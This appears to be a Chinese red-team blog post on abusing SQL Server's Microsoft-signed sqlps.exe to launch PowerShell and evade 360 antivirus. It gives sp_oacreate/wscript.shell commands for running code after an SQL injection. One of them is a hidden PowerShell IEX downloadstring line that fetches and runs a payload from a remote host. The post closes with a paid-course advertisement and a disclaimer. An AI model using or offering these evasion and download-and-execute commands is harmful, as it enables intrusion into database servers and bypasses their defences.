0x00 前言

sql server 默认安装后，会发现有一个 sqlps.exe：

此文件本身自带微软签名：

sqlps的功能，竟然是！启动 powershell？？？

而且由于此文件无依赖，因此可以单独取出在无sql server机器上运行。

0x01 sqlps 上线

之前使用 powershell 上线，360 必拦截：

使用sqlps，360无反应且能正常上线：

0x02 sp_oacreate

sql server 注入后提权的方法比较多，但是被杀软拦截的也比较厉害，xp_cmdshell会被拦，sp_oacreate也会被拦。

declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:/windows/system32/cmd.exe'

declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'C:\Users\Public\SQLPS.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring(''http://192.168.80.138:80/a''))"'

成功上线，弊端是 sql server 默认为service权限，因此对很多目录包括sql server 默认目录都无法执行该程序，因此要提前上传sqlps至C:\Users\Public目录。

 「你即将失去如下所有学习变强机会」

学习效率低，学不到实战内容，花几千、上万报机构没有性价比

一顿自助钱，我承诺一定让用户满意，也希望用户能给予我一份信任

【详情下方图片了解】，【扫下方二维码加入】：只做高质量优质精品内容」

免费红队知识库：

免责声明

由于传播、利用本公众号所提供的信息而造成的任何直接或者间接的后果及损失，均由使用者本人负责，本公众号及作者不为此承担任何责任，一旦造成后果请自行承担！如有侵权烦请告知，我们会立即删除并致歉。谢谢！